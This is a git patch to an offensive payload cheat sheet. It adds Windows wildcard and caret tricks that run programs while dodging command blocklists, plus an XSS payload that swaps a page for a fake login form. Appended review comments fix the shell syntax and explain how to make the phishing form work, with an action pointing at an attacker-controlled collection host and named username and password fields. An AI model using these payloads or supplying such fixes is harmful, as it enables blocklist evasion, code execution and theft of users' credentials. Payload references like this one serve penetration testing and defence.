From ea0bddc18a12d6ad46e763fbc52f93481b1a5620 Mon Sep 17 00:00:00 2001 From: Swissky <swisskysec@protonmail.com> Date: Tue, 8 Jan 2019 20:49:05 +0100 Subject: [PATCH] Windows RCE wildcard + XSS UI redressing --- Remote commands execution/README.md | 6 ++++++ XSS injection/README.md | 9 +++++++++ 2 files changed, 15 insertions(+) diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 38d3589..828a481 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -110,6 +110,12 @@ cat ${test//hhh\/hm/} cat ${test//hh??hm/} ``` +Bypass blacklisted word with wildcards +```powershell +powershell C:\*\*2\n??e*d.*? # notepad +@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc +``` + Bypass zsh/bash/sh blacklist ```powershell diff --git a/XSS injection/README.md b/XSS injection/README.md index 781975e..9df2b3e 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -33,6 +33,15 @@ fclose($fp); ?> ``` +UI redressing (Sophisticated phishing) + +```html +<script> +history.replaceState(null, null, '../../../login'); +document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>" +</script> +``` + Keylogger for XSS ```javascript
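Review bot: in the Remote commands execution/README.md hunk, the block added under `Bypass blacklisted word with wildcards` is fenced as ```powershell but the payloads are cmd.exe syntax: the `^` caret escaping and leading `@` in `@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e` are cmd/batch constructs, and `#` is not a comment character in cmd.exe, so a reader who pastes `powershell C:\*\*2\n??e*d.*? # notepad` verbatim passes `#` and `notepad` to the spawned PowerShell as extra arguments. Suggest tagging the fence `cmd` (the neighbouring `Bypass zsh/bash/sh blacklist` block in the context carries the same `powershell` tag, so the file's fence tags deserve a pass) and moving the `# notepad` / `# calc` annotations into a prose sentence that also says what the wildcards are expected to resolve to (presumably `C:\Windows\System32\notepad.exe` and `calc.exe`), since the bypass depends on that path layout and on no other directory under `C:\` matching the pattern. Also `word` should be `words` in the heading.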
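Review bot: in the XSS injection/README.md hunk, the `<input value='submit' type='submit'>` of the UI-redressing payload is placed outside the `<form>` it is meant to submit, the two inputs have no `name` attributes, and the form has no `action`, so as written the fake login page captures nothing: clicking the button does nothing, and even with the button inside the form a submission would only reload the current path with unnamed fields. For the payload to live up to "Sophisticated phishing", give the form an `action` pointing at an attacker-controlled URL (or an `onsubmit` handler that exfiltrates the values), name the inputs, and put the submit button inside the form, e.g. `<form action='https://<attacker-host>/collect' method='post'>` with `<input type='text' name='u'>` and `<input type='password' name='p'>`. Minor: `</br>` is a stray end tag that browsers merely tolerate, use `<br>`; and a one-line note that `history.replaceState(null, null, '../../../login')` can only rewrite the path within the current origin would stop readers from expecting it to display another domain in the address bar.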